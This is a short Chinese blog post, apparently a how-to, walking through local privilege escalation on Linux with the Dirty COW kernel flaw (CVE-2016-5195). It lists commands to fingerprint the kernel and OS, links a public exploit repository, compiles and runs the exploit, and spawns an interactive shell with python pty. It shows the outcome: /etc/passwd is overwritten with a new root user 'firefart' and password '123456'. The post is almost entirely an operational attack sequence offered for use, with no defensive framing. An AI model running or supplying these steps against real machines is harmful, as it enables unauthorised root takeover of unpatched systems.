linux内核提权(脏牛CVE-2016-5195)
2020-04-24 本文已影响0人
migrate_
- 漏洞范围:
Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复) - 查看版本信息
uname -a
uname -r
cat /etc/issue
cat /etc/*-release

- 在脏牛的影响范围内,直接上传脚本
https://github.com/FireFart/dirtycow
- 给脚本执行权限
chmod 777 dirty.c
- 编译脚本
#利用gcc编译dirty.c文件
gcc -pthread dirty.c -o dirty -lcrypt

- 切换交互式shell
python -c 'import pty;pty.spawn("/bin/sh")'
- 执行脚本
./dirty 123456 //(密码)


- /etc/passwd 文件已经更改
firefart:123456 //用户名:密码
//利用之前最后做个备份 /etc/passwd